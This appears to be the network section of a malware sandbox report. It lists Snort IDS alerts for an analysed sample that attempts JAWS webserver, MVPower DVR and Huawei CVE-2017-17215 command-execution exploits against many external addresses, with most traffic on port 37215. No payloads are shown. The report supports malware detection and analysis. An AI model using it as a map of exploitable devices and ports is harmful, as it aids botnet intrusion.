      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44912 -> 173.95.53.154:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50944 -> 185.32.126.32:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46740 -> 123.136.83.10:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52066 -> 208.106.233.178:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59562 -> 52.85.131.245:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44228 -> 104.107.149.204:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51952 -> 156.254.80.70:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51952 -> 156.254.80.70:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53502 -> 192.126.135.96:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43828 -> 205.196.223.118:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58918 -> 194.47.64.17:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44912 -> 173.95.53.154:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41622 -> 156.241.121.15:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41622 -> 156.241.121.15:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46740 -> 123.136.83.10:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52066 -> 208.106.233.178:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59744 -> 202.40.219.199:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50944 -> 185.32.126.32:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53284 -> 156.244.93.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40188 -> 154.213.118.57:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40188 -> 154.213.118.57:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34906 -> 65.25.201.90:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38908 -> 159.223.194.136:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38430 -> 13.91.138.127:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47448 -> 163.5.154.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56352 -> 13.225.26.178:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43186 -> 23.52.181.28:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51022 -> 212.51.159.20:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44710 -> 191.101.131.21:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34906 -> 65.25.201.90:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32990 -> 13.239.176.68:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55564 -> 50.62.222.150:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46906 -> 65.110.67.4:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38908 -> 159.223.194.136:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38430 -> 13.91.138.127:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37518 -> 162.14.120.45:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47448 -> 163.5.154.23:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56352 -> 13.225.26.178:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43186 -> 23.52.181.28:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51022 -> 212.51.159.20:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55564 -> 50.62.222.150:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46906 -> 65.110.67.4:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44710 -> 191.101.131.21:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32990 -> 13.239.176.68:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59858 -> 43.248.169.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54910 -> 81.60.196.106:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37518 -> 162.14.120.45:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59858 -> 43.248.169.50:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54910 -> 81.60.196.106:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34324 -> 34.49.218.227:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34324 -> 34.49.218.227:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47328 -> 38.173.86.119:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37832 -> 60.43.214.231:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57954 -> 121.194.9.198:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58784 -> 210.243.112.157:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53132 -> 8.130.31.213:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58234 -> 23.57.227.142:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37582 -> 74.126.94.24:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37582 -> 74.126.94.24:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47328 -> 38.173.86.119:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37832 -> 60.43.214.231:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41628 -> 65.9.190.80:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57954 -> 121.194.9.198:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58784 -> 210.243.112.157:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53132 -> 8.130.31.213:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58234 -> 23.57.227.142:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48154 -> 170.84.253.69:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33582 -> 122.116.234.207:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41628 -> 65.9.190.80:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46802 -> 123.56.30.121:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41036 -> 117.215.83.255:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33582 -> 122.116.234.207:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46802 -> 123.56.30.121:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58516 -> 156.254.67.205:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58516 -> 156.254.67.205:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49362 -> 41.44.41.67:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49362 -> 41.44.41.67:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41036 -> 117.215.83.255:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58968 -> 99.84.164.157:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39522 -> 104.25.138.57:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35540 -> 47.135.166.183:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41134 -> 64.44.24.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33814 -> 138.68.44.232:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59722 -> 38.165.19.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52724 -> 20.71.11.130:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48922 -> 35.177.178.238:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58968 -> 99.84.164.157:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39522 -> 104.25.138.57:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41134 -> 64.44.24.199:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35540 -> 47.135.166.183:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33814 -> 138.68.44.232:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48622 -> 104.107.160.199:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38044 -> 156.77.134.82:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38044 -> 156.77.134.82:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43164 -> 52.16.167.220:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59722 -> 38.165.19.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57384 -> 109.104.144.98:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52724 -> 20.71.11.130:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48922 -> 35.177.178.238:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46026 -> 38.47.144.163:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46194 -> 139.9.139.44:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48622 -> 104.107.160.199:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60580 -> 41.47.185.58:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60580 -> 41.47.185.58:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43164 -> 52.16.167.220:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40766 -> 23.59.184.246:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57384 -> 109.104.144.98:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33108 -> 23.211.159.196:80
      Source: global trafficTCP traffic: 197.8.25.37 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.4.200.137 ports 1,2,3,5,7,37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58310 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41622 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41622 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41622 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58516 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 49362
      Source: unknownNetwork traffic detected: HTTP traffic on port 38044 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60580
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58516 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41622 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39650 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39650
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58516 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39758 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39758
      Source: unknownNetwork traffic detected: HTTP traffic on port 41622 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39958 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39958
      Source: unknownNetwork traffic detected: HTTP traffic on port 58516 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40828 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40828 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40828 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41622 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40828 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56368 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40828 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 58516 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51952 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47522 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47522 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40828 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36632 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40596 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47522 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35100 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40596 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 35100
      Source: unknownNetwork traffic detected: HTTP traffic on port 40596 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47522 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42036 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40596 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42036 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41862 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59940 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42036 -> 37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.46.119.203:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.194.86.103:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.230.3.248:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.242.219.182:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.204.228.24:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.86.114.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.249.231.121:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.74.156.24:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.181.223.133:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.218.203.81:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.18.164.81:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.110.146.51:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.35.103.169:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.15.159.67:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.200.78.147:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.62.2.96:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.215.213.173:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.129.145.127:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.219.201.58:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.21.243.6:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.176.88.122:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.187.106.31:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.70.70.57:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.185.160.183:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.243.82.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.39.166.78:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.101.253.211:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.245.121.94:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.231.185.98:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.110.164.43:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.23.163.107:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.236.70.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.139.254.204:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.162.88.130:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.142.62.222:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.226.178.208:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.0.86.97:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.59.151.234:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.166.163.109:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.7.71.178:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.51.27.44:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.74.53.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.93.131.182:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.29.103.249:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.41.79.195:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.62.108.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.74.227.171:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.50.135.47:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.17.41.46:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.120.164.78:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.18.60.241:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.23.25.27:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.68.241.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.229.201.86:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.228.132.54:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.200.65.190:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.66.140.6:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.228.7.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.169.213.238:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.116.123.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.106.34.246:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.209.193.66:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.193.154.208:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.18.3.24:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.217.120.89:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.37.244.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.25.72.245:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.4.200.137:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.2.188.190:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.132.160.167:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.21.110.0:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.180.30.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.171.208.55:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.54.82.6:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.187.142.75:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.123.20.195:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.66.50.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.28.36.31:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.252.116.11:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.182.110.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.119.217.2:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.13.182.190:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.155.201.36:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.86.217.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.25.198.167:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.100.213.76:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.10.118.235:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.45.120.235:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.128.124.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.43.95.173:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.42.17.196:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.204.97.175:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.155.39.72:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.52.35.181:37215
